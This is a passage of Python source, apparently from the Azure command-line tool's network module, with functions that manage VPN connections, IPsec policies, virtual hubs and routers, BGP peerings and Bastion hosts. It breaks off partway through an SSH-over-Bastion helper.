DeploymentProperties = cmd.get_models('DeploymentProperties', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
tags = tags or {}
# Build up the ARM template
master_template = ArmTemplateBuilder()
vpn_connection_resource = build_vpn_connection_resource(
cmd, connection_name, location, tags, vnet_gateway1,
vnet_gateway2 or local_gateway2 or express_route_circuit2,
connection_type, authorization_key, enable_bgp, routing_weight, shared_key,
use_policy_based_traffic_selectors, express_route_gateway_bypass, ingress_nat_rule, egress_nat_rule)
master_template.add_resource(vpn_connection_resource)
master_template.add_output('resource', connection_name, output_type='object')
if shared_key:
master_template.add_secure_parameter('sharedKey', shared_key)
if authorization_key:
master_template.add_secure_parameter('authorizationKey', authorization_key)
template = master_template.build()
parameters = master_template.build_parameters()
# deploy ARM template
deployment_name = 'vpn_connection_deploy_' + random_string(32)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES).deployments
properties = DeploymentProperties(template=template, parameters=parameters, mode='incremental')
Deployment = cmd.get_models('Deployment', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
deployment = Deployment(properties=properties)
if validate:
_log_pprint_template(template)
if cmd.supported_api_version(min_api='2019-10-01', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES):
from azure.cli.core.commands import LongRunningOperation
validation_poller = client.begin_validate(resource_group_name, deployment_name, deployment)
return LongRunningOperation(cmd.cli_ctx)(validation_poller)
return client.validate(resource_group_name, deployment_name, deployment)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, deployment_name, deployment)
def update_vpn_connection(cmd, instance, routing_weight=None, shared_key=None, tags=None,
enable_bgp=None, use_policy_based_traffic_selectors=None,
express_route_gateway_bypass=None):
with cmd.update_context(instance) as c:
c.set_param('routing_weight', routing_weight)
c.set_param('shared_key', shared_key)
c.set_param('tags', tags)
c.set_param('enable_bgp', enable_bgp)
c.set_param('express_route_gateway_bypass', express_route_gateway_bypass)
c.set_param('use_policy_based_traffic_selectors', use_policy_based_traffic_selectors)
# TODO: Remove these when issue #1615 is fixed
gateway1_id = parse_resource_id(instance.virtual_network_gateway1.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway1_id['subscription'])
instance.virtual_network_gateway1 = ncf.virtual_network_gateways.get(
gateway1_id['resource_group'], gateway1_id['name'])
if instance.virtual_network_gateway2:
gateway2_id = parse_resource_id(instance.virtual_network_gateway2.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway2_id['subscription'])
instance.virtual_network_gateway2 = ncf.virtual_network_gateways.get(
gateway2_id['resource_group'], gateway2_id['name'])
if instance.local_network_gateway2:
gateway2_id = parse_resource_id(instance.local_network_gateway2.id)
ncf = network_client_factory(cmd.cli_ctx, subscription_id=gateway2_id['subscription'])
instance.local_network_gateway2 = ncf.local_network_gateways.get(
gateway2_id['resource_group'], gateway2_id['name'])
return instance
def list_vpn_connections(cmd, resource_group_name, virtual_network_gateway_name=None):
if virtual_network_gateway_name:
client = network_client_factory(cmd.cli_ctx).virtual_network_gateways
return client.list_connections(resource_group_name, virtual_network_gateway_name)
client = network_client_factory(cmd.cli_ctx).virtual_network_gateway_connections
return client.list(resource_group_name)
def start_vpn_conn_package_capture(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
filter_data=None, no_wait=False):
VpnPacketCaptureStartParameters = cmd.get_models('VpnPacketCaptureStartParameters')
parameters = VpnPacketCaptureStartParameters(filter_data=filter_data)
return sdk_no_wait(no_wait, client.begin_start_packet_capture, resource_group_name,
virtual_network_gateway_connection_name, parameters=parameters)
def stop_vpn_conn_package_capture(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
sas_url, no_wait=False):
VpnPacketCaptureStopParameters = cmd.get_models('VpnPacketCaptureStopParameters')
parameters = VpnPacketCaptureStopParameters(sas_url=sas_url)
return sdk_no_wait(no_wait, client.begin_stop_packet_capture, resource_group_name,
virtual_network_gateway_connection_name, parameters=parameters)
def show_vpn_connection_device_config_script(cmd, client, resource_group_name, virtual_network_gateway_connection_name,
vendor, device_family, firmware_version):
VpnDeviceScriptParameters = cmd.get_models('VpnDeviceScriptParameters')
parameters = VpnDeviceScriptParameters(
vendor=vendor,
device_family=device_family,
firmware_version=firmware_version
)
return client.vpn_device_configuration_script(resource_group_name, virtual_network_gateway_connection_name,
parameters=parameters)
# endregion
# region IPSec Policy Commands
def add_vnet_gateway_ipsec_policy(cmd, resource_group_name, gateway_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
IpsecPolicy = cmd.get_models('IpsecPolicy')
new_policy = IpsecPolicy(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
try:
if gateway.vpn_client_configuration.vpn_client_ipsec_policies:
gateway.vpn_client_configuration.vpn_client_ipsec_policies.append(new_policy)
else:
gateway.vpn_client_configuration.vpn_client_ipsec_policies = [new_policy]
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def clear_vnet_gateway_ipsec_policies(cmd, resource_group_name, gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
try:
gateway.vpn_client_configuration.vpn_client_ipsec_policies = None
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
if no_wait:
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
from azure.cli.core.commands import LongRunningOperation
poller = sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
return LongRunningOperation(cmd.cli_ctx)(poller).vpn_client_configuration.vpn_client_ipsec_policies
def list_vnet_gateway_ipsec_policies(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
try:
return ncf.get(resource_group_name, gateway_name).vpn_client_configuration.vpn_client_ipsec_policies
except AttributeError:
raise CLIError('VPN client configuration must first be set through `az network vnet-gateway create/update`.')
def add_vpn_conn_ipsec_policy(cmd, client, resource_group_name, connection_name,
sa_life_time_seconds, sa_data_size_kilobytes,
ipsec_encryption, ipsec_integrity,
ike_encryption, ike_integrity, dh_group, pfs_group, no_wait=False):
IpsecPolicy = cmd.get_models('IpsecPolicy')
new_policy = IpsecPolicy(sa_life_time_seconds=sa_life_time_seconds,
sa_data_size_kilobytes=sa_data_size_kilobytes,
ipsec_encryption=ipsec_encryption,
ipsec_integrity=ipsec_integrity,
ike_encryption=ike_encryption,
ike_integrity=ike_integrity,
dh_group=dh_group,
pfs_group=pfs_group)
conn = client.get(resource_group_name, connection_name)
if conn.ipsec_policies:
conn.ipsec_policies.append(new_policy)
else:
conn.ipsec_policies = [new_policy]
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
def clear_vpn_conn_ipsec_policies(cmd, client, resource_group_name, connection_name, no_wait=False):
conn = client.get(resource_group_name, connection_name)
conn.ipsec_policies = None
conn.use_policy_based_traffic_selectors = False
if no_wait:
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
from azure.cli.core.commands import LongRunningOperation
poller = sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, connection_name, conn)
return LongRunningOperation(cmd.cli_ctx)(poller).ipsec_policies
def list_vpn_conn_ipsec_policies(cmd, client, resource_group_name, connection_name):
return client.get(resource_group_name, connection_name).ipsec_policies
def assign_vnet_gateway_aad(cmd, resource_group_name, gateway_name,
aad_tenant, aad_audience, aad_issuer, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
gateway.vpn_client_configuration.aad_tenant = aad_tenant
gateway.vpn_client_configuration.aad_audience = aad_audience
gateway.vpn_client_configuration.aad_issuer = aad_issuer
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def show_vnet_gateway_aad(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
return gateway.vpn_client_configuration
def remove_vnet_gateway_aad(cmd, resource_group_name, gateway_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
if gateway.vpn_client_configuration is None:
raise CLIError('VPN client configuration must be set first through `az network vnet-gateway create/update`.')
gateway.vpn_client_configuration.aad_tenant = None
gateway.vpn_client_configuration.aad_audience = None
gateway.vpn_client_configuration.aad_issuer = None
if cmd.supported_api_version(min_api='2020-11-01'):
gateway.vpn_client_configuration.vpn_authentication_types = None
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def add_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name, name, internal_mappings, external_mappings,
rule_type=None, mode=None, ip_config_id=None, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
VirtualNetworkGatewayNatRule, VpnNatRuleMapping = cmd.get_models('VirtualNetworkGatewayNatRule',
'VpnNatRuleMapping')
gateway.nat_rules.append(
VirtualNetworkGatewayNatRule(type_properties_type=rule_type, mode=mode, name=name,
internal_mappings=[VpnNatRuleMapping(address_space=i_map) for i_map in internal_mappings] if internal_mappings else None,
external_mappings=[VpnNatRuleMapping(address_space=e_map) for e_map in external_mappings] if external_mappings else None,
ip_configuration_id=ip_config_id))
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
def show_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
return gateway.nat_rules
def remove_vnet_gateway_nat_rule(cmd, resource_group_name, gateway_name, name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx).virtual_network_gateways
gateway = ncf.get(resource_group_name, gateway_name)
for rule in gateway.nat_rules:
if name == rule.name:
gateway.nat_rules.remove(rule)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, gateway_name, gateway)
raise UnrecognizedArgumentError(f'No NAT rule named "{name}" was found on this gateway.')
# endregion
# region VirtualHub
def create_virtual_hub(cmd, client,
resource_group_name,
virtual_hub_name,
hosted_subnet,
public_ip_address=None,
location=None,
tags=None):
from azure.core.exceptions import HttpResponseError
from azure.cli.core.commands import LongRunningOperation
try:
client.get(resource_group_name, virtual_hub_name)
raise CLIError('The VirtualHub "{}" under resource group "{}" exists'.format(
virtual_hub_name, resource_group_name))
except HttpResponseError:
pass
SubResource = cmd.get_models('SubResource')
VirtualHub, HubIpConfiguration = cmd.get_models('VirtualHub', 'HubIpConfiguration')
hub = VirtualHub(tags=tags, location=location,
virtual_wan=None,
sku='Standard')
vhub_poller = client.begin_create_or_update(resource_group_name, virtual_hub_name, hub)
LongRunningOperation(cmd.cli_ctx)(vhub_poller)
ip_config = HubIpConfiguration(
subnet=SubResource(id=hosted_subnet),
public_ip_address=SubResource(id=public_ip_address) if public_ip_address else None,
)
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
try:
vhub_ip_poller = vhub_ip_config_client.begin_create_or_update(
resource_group_name, virtual_hub_name, 'Default', ip_config)
LongRunningOperation(cmd.cli_ctx)(vhub_ip_poller)
except Exception as ex:
logger.error(ex)
try:
vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
except HttpResponseError:
pass
client.begin_delete(resource_group_name, virtual_hub_name)
raise ex
return client.get(resource_group_name, virtual_hub_name)
def virtual_hub_update_setter(client, resource_group_name, virtual_hub_name, parameters):
return client.begin_create_or_update(resource_group_name, virtual_hub_name, parameters)
def update_virtual_hub(cmd, instance,
tags=None,
allow_branch_to_branch_traffic=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
c.set_param('allow_branch_to_branch_traffic', allow_branch_to_branch_traffic)
return instance
def delete_virtual_hub(cmd, client, resource_group_name, virtual_hub_name, no_wait=False):
from azure.cli.core.commands import LongRunningOperation
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
ip_configs = list(vhub_ip_config_client.list(resource_group_name, virtual_hub_name))
if ip_configs:
ip_config = ip_configs[0] # There will always be only 1
poller = vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, ip_config.name)
LongRunningOperation(cmd.cli_ctx)(poller)
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, virtual_hub_name)
def list_virtual_hub(client, resource_group_name=None):
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name)
return client.list()
def create_virtual_hub_bgp_connection(cmd, client, resource_group_name, virtual_hub_name, connection_name,
peer_asn, peer_ip, no_wait=False):
BgpConnection = cmd.get_models('BgpConnection')
vhub_bgp_conn = BgpConnection(name=connection_name, peer_asn=peer_asn, peer_ip=peer_ip)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name,
virtual_hub_name, connection_name, vhub_bgp_conn)
def virtual_hub_bgp_connection_update_setter(client, resource_group_name,
virtual_hub_name, connection_name,
parameters):
return client.begin_create_or_update(resource_group_name, virtual_hub_name, connection_name, parameters)
def update_virtual_hub_bgp_connection(cmd, instance, peer_asn=None, peer_ip=None):
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('peer_ip', peer_ip)
return instance
def delete_virtual_hub_bgp_connection(client, resource_group_name,
virtual_hub_name, connection_name, no_wait=False):
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, virtual_hub_name, connection_name)
def list_virtual_hub_bgp_connection_learned_routes(client, resource_group_name, virtual_hub_name, connection_name):
return client.begin_list_learned_routes(resource_group_name, virtual_hub_name, connection_name)
def list_virtual_hub_bgp_connection_advertised_routes(client, resource_group_name, virtual_hub_name, connection_name):
return client.begin_list_advertised_routes(resource_group_name, virtual_hub_name, connection_name)
# endregion
# region VirtualRouter
def create_virtual_router(cmd,
resource_group_name,
virtual_router_name,
hosted_gateway=None,
hosted_subnet=None,
location=None,
tags=None):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
from azure.core.exceptions import HttpResponseError
try:
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
virtual_hub_name = virtual_router_name
try:
vhub_client.get(resource_group_name, virtual_hub_name)
raise CLIError('The VirtualRouter "{}" under resource group "{}" exists'.format(virtual_hub_name,
resource_group_name))
except HttpResponseError:
pass
SubResource = cmd.get_models('SubResource')
# for old VirtualRouter
if hosted_gateway is not None:
VirtualRouter = cmd.get_models('VirtualRouter')
virtual_router = VirtualRouter(virtual_router_asn=None,
virtual_router_ips=[],
hosted_subnet=None,
hosted_gateway=SubResource(id=hosted_gateway),
location=location,
tags=tags)
return vrouter_client.begin_create_or_update(resource_group_name, virtual_router_name, virtual_router)
# for VirtualHub
VirtualHub, HubIpConfiguration = cmd.get_models('VirtualHub', 'HubIpConfiguration')
hub = VirtualHub(tags=tags, location=location, virtual_wan=None, sku='Standard')
ip_config = HubIpConfiguration(subnet=SubResource(id=hosted_subnet))
from azure.cli.core.commands import LongRunningOperation
vhub_poller = vhub_client.begin_create_or_update(resource_group_name, virtual_hub_name, hub)
LongRunningOperation(cmd.cli_ctx)(vhub_poller)
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
try:
vhub_ip_poller = vhub_ip_config_client.begin_create_or_update(resource_group_name,
virtual_hub_name,
'Default',
ip_config)
LongRunningOperation(cmd.cli_ctx)(vhub_ip_poller)
except Exception as ex:
logger.error(ex)
vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
vhub_client.begin_delete(resource_group_name, virtual_hub_name)
raise ex
return vhub_client.get(resource_group_name, virtual_hub_name)
def virtual_router_update_getter(cmd, resource_group_name, virtual_router_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
return vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError: # 404
pass
virtual_hub_name = virtual_router_name
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
return vhub_client.get(resource_group_name, virtual_hub_name)
def virtual_router_update_setter(cmd, resource_group_name, virtual_router_name, parameters):
if parameters.type == 'Microsoft.Network/virtualHubs':
client = network_client_factory(cmd.cli_ctx).virtual_hubs
else:
client = network_client_factory(cmd.cli_ctx).virtual_routers
# If the client is virtual_hubs,
# the virtual_router_name represents virtual_hub_name and
# the parameters represents VirtualHub
return client.begin_create_or_update(resource_group_name, virtual_router_name, parameters)
def update_virtual_router(cmd, instance, tags=None):
# both VirtualHub and VirtualRouter own those properties
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
return instance
def list_virtual_router(cmd, resource_group_name=None):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
if resource_group_name is not None:
vrouters = vrouter_client.list_by_resource_group(resource_group_name)
vhubs = vhub_client.list_by_resource_group(resource_group_name)
else:
vrouters = vrouter_client.list()
vhubs = vhub_client.list()
return list(vrouters) + list(vhubs)
def show_virtual_router(cmd, resource_group_name, virtual_router_name):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
from azure.core.exceptions import HttpResponseError
try:
item = vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
virtual_hub_name = virtual_router_name
item = vhub_client.get(resource_group_name, virtual_hub_name)
return item
def delete_virtual_router(cmd, resource_group_name, virtual_router_name):
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_ip_config_client = network_client_factory(cmd.cli_ctx).virtual_hub_ip_configuration
from azure.core.exceptions import HttpResponseError
try:
vrouter_client.get(resource_group_name, virtual_router_name)
item = vrouter_client.begin_delete(resource_group_name, virtual_router_name)
except HttpResponseError:
from azure.cli.core.commands import LongRunningOperation
virtual_hub_name = virtual_router_name
poller = vhub_ip_config_client.begin_delete(resource_group_name, virtual_hub_name, 'Default')
LongRunningOperation(cmd.cli_ctx)(poller)
item = vhub_client.begin_delete(resource_group_name, virtual_hub_name)
return item
def create_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name, peer_asn, peer_ip):
# try VirtualRouter first
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
VirtualRouterPeering = cmd.get_models('VirtualRouterPeering')
virtual_router_peering = VirtualRouterPeering(peer_asn=peer_asn, peer_ip=peer_ip)
return vrouter_peering_client.begin_create_or_update(resource_group_name,
virtual_router_name,
peering_name,
virtual_router_peering)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# then try VirtualHub if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
BgpConnection = cmd.get_models('BgpConnection')
vhub_bgp_conn = BgpConnection(name=peering_name, peer_asn=peer_asn, peer_ip=peer_ip)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.begin_create_or_update(resource_group_name, virtual_hub_name,
bgp_conn_name, vhub_bgp_conn)
def virtual_router_peering_update_getter(cmd, resource_group_name, virtual_router_name, peering_name):
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
from azure.core.exceptions import HttpResponseError
try:
return vrouter_peering_client.get(resource_group_name, virtual_router_name, peering_name)
except HttpResponseError: # 404
pass
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.get(resource_group_name, virtual_hub_name, bgp_conn_name)
def virtual_router_peering_update_setter(cmd, resource_group_name, virtual_router_name, peering_name, parameters):
if parameters.type == 'Microsoft.Network/virtualHubs/bgpConnections':
client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
else:
client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
# if the client is virtual_hub_bgp_connection,
# the virtual_router_name represents virtual_hub_name and
# the peering_name represents bgp_connection_name and
# the parameters represents BgpConnection
return client.begin_create_or_update(resource_group_name, virtual_router_name, peering_name, parameters)
def update_virtual_router_peering(cmd, instance, peer_asn=None, peer_ip=None):
# both VirtualHub and VirtualRouter own those properties
with cmd.update_context(instance) as c:
c.set_param('peer_asn', peer_asn)
c.set_param('peer_ip', peer_ip)
return instance
def list_virtual_router_peering(cmd, resource_group_name, virtual_router_name):
virtual_hub_name = virtual_router_name
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
try:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
vrouter_peerings = list(vrouter_peering_client.list(resource_group_name, virtual_router_name))
except HttpResponseError:
vrouter_peerings = []
virtual_hub_name = virtual_router_name
try:
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connections
vhub_bgp_connections = list(vhub_bgp_conn_client.list(resource_group_name, virtual_hub_name))
except HttpResponseError:
vhub_bgp_connections = []
return list(vrouter_peerings) + list(vhub_bgp_connections)
def show_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except HttpResponseError:
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
return vrouter_peering_client.get(resource_group_name, virtual_router_name, peering_name)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# then try VirtualHub if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.get(resource_group_name, virtual_hub_name, bgp_conn_name)
def delete_virtual_router_peering(cmd, resource_group_name, virtual_router_name, peering_name):
from azure.core.exceptions import HttpResponseError
try:
vrouter_client = network_client_factory(cmd.cli_ctx).virtual_routers
vrouter_client.get(resource_group_name, virtual_router_name)
except: # pylint: disable=bare-except
pass
else:
vrouter_peering_client = network_client_factory(cmd.cli_ctx).virtual_router_peerings
return vrouter_peering_client.begin_delete(resource_group_name, virtual_router_name, peering_name)
virtual_hub_name = virtual_router_name
bgp_conn_name = peering_name
# then try VirtualHub if the virtual router doesn't exist
try:
vhub_client = network_client_factory(cmd.cli_ctx).virtual_hubs
vhub_client.get(resource_group_name, virtual_hub_name)
except HttpResponseError:
msg = 'The VirtualRouter "{}" under resource group "{}" was not found'.format(virtual_hub_name,
resource_group_name)
raise CLIError(msg)
vhub_bgp_conn_client = network_client_factory(cmd.cli_ctx).virtual_hub_bgp_connection
return vhub_bgp_conn_client.begin_delete(resource_group_name, virtual_hub_name, bgp_conn_name)
# endregion
# region service aliases
def list_service_aliases(cmd, location, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).available_service_aliases
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name, location=location)
return client.list(location=location)
# endregion
# region bastion
def create_bastion_host(cmd, resource_group_name, bastion_host_name, virtual_network_name,
public_ip_address, location=None, subnet='AzureBastionSubnet', scale_units=None, sku=None, tags=None):
client = network_client_factory(cmd.cli_ctx).bastion_hosts
(BastionHost,
BastionHostIPConfiguration,
SubResource) = cmd.get_models('BastionHost',
'BastionHostIPConfiguration',
'SubResource')
ip_config_name = "bastion_ip_config"
ip_configuration = BastionHostIPConfiguration(name=ip_config_name,
subnet=SubResource(id=subnet),
public_ip_address=SubResource(id=public_ip_address))
bastion_host = BastionHost(ip_configurations=[ip_configuration],
location=location,
tags=tags)
if cmd.supported_api_version(min_api='2021-03-01'):
sku_type = cmd.get_models('Sku')
sku = sku_type(name=sku)
bastion_host = BastionHost(ip_configurations=[ip_configuration],
location=location,
scale_units=scale_units,
sku=sku,
tags=tags)
return client.begin_create_or_update(resource_group_name=resource_group_name,
bastion_host_name=bastion_host_name,
parameters=bastion_host)
def list_bastion_host(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).bastion_hosts
if resource_group_name is not None:
return client.list_by_resource_group(resource_group_name=resource_group_name)
return client.list()
SSH_EXTENSION_NAME = 'ssh'
SSH_EXTENSION_MODULE = 'azext_ssh.custom'
SSH_UTILS_EXTENSION_MODULE = 'azext_ssh.ssh_utils'
SSH_EXTENSION_VERSION = '0.1.3'
def _get_azext_module(extension_name, module_name):
try:
# Adding the installed extension in the path
from azure.cli.core.extension.operations import add_extension_to_path
add_extension_to_path(extension_name)
# Import the extension module
from importlib import import_module
azext_custom = import_module(module_name)
return azext_custom
except ImportError as ie:
raise CLIError(ie)
def _test_extension(extension_name):
from azure.cli.core.extension import (get_extension)
from pkg_resources import parse_version
ext = get_extension(extension_name)
if parse_version(ext.version) < parse_version(SSH_EXTENSION_VERSION):
raise CLIError('SSH Extension (version >= "{}") must be installed'.format(SSH_EXTENSION_VERSION))
def _get_ssh_path(ssh_command="ssh"):
import os
ssh_path = ssh_command
if platform.system() == 'Windows':
arch_data = platform.architecture()
is_32bit = arch_data[0] == '32bit'
sys_path = 'SysNative' if is_32bit else 'System32'
system_root = os.environ['SystemRoot']
system32_path = os.path.join(system_root, sys_path)
ssh_path = os.path.join(system32_path, "openSSH", (ssh_command + ".exe"))
logger.debug("Platform architecture: %s", str(arch_data))
logger.debug("System Root: %s", system_root)
logger.debug("Attempting to run ssh from path %s", ssh_path)
if not os.path.isfile(ssh_path):
raise CLIError("Could not find " + ssh_command + ".exe. Is the OpenSSH client installed?")
else:
raise UnrecognizedArgumentError("Platform is not supported for this command. Supported platforms: Windows")
return ssh_path
def _get_rdp_path(rdp_command="mstsc"):
import os
rdp_path = rdp_command
if platform.system() == 'Windows':
arch_data = platform.architecture()
sys_path = 'System32'
system_root = os.environ['SystemRoot']
system32_path = os.path.join(system_root, sys_path)
rdp_path = os.path.join(system32_path, (rdp_command + ".exe"))
logger.debug("Platform architecture: %s", str(arch_data))
logger.debug("System Root: %s", system_root)
logger.debug("Attempting to run rdp from path %s", rdp_path)
if not os.path.isfile(rdp_path):
raise CLIError("Could not find " + rdp_command + ".exe. Is the rdp client installed?")
else:
raise UnrecognizedArgumentError("Platform is not supported for this command. Supported platforms: Windows")
return rdp_path
def _get_host(username, ip):
return username + "@" + ip
def _build_args(cert_file, private_key_file):
private_key = []
certificate = []
if private_key_file:
private_key = ["-i", private_key_file]
if cert_file:
certificate = ["-o", "CertificateFile=" + cert_file]
return private_key + certificate
def ssh_bastion_host(cmd, auth_type, target_resource_id, resource_group_name, bastion_host_name, resource_port=None, username=None, ssh_key=None):
import os
_test_extension(SSH_EXTENSION_NAME)
if not resource_port:
resource_port = 22
if not is_valid_resource_id(target_resource_id):
raise InvalidArgumentValueError("Please enter a valid Virtual Machine resource Id.")
tunnel_server = get_tunnel(cmd, resource_group_name, bastion_host_name, target_resource_id, resource_port)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
if auth_type.lower() == 'password':
if username is None:
raise RequiredArgumentMissingError("Please enter username with --username.")
command = [_get_ssh_path(), _get_host(username, 'localhost')]
elif auth_type.lower() == 'aad':
azssh = _get_azext_module(SSH_EXTENSION_NAME, SSH_EXTENSION_MODULE)
azssh_utils = _get_azext_module(SSH_EXTENSION_NAME, SSH_UTILS_EXTENSION_MODULE)
cert_folder = tempfile.mkdtemp(prefix="aadsshcert")
if not os.path.isdir(cert_folder):
os.makedirs(cert_folder)
azssh.ssh_cert(cmd, cert_path=os.path.join(cert_folder, "id_rsa.pub-aadcert.pub"))
private_key_file = os.path.join(cert_folder, "id_rsa")
cert_file = os.path.join(cert_folder, "id_rsa.pub-aadcert.pub")
username = azssh_utils.get_ssh_cert_principals(cert_file)[0]
command = [_get_ssh_path(), _get_host(username, 'localhost')]
command = command + _build_args(cert_file, private_key_file)
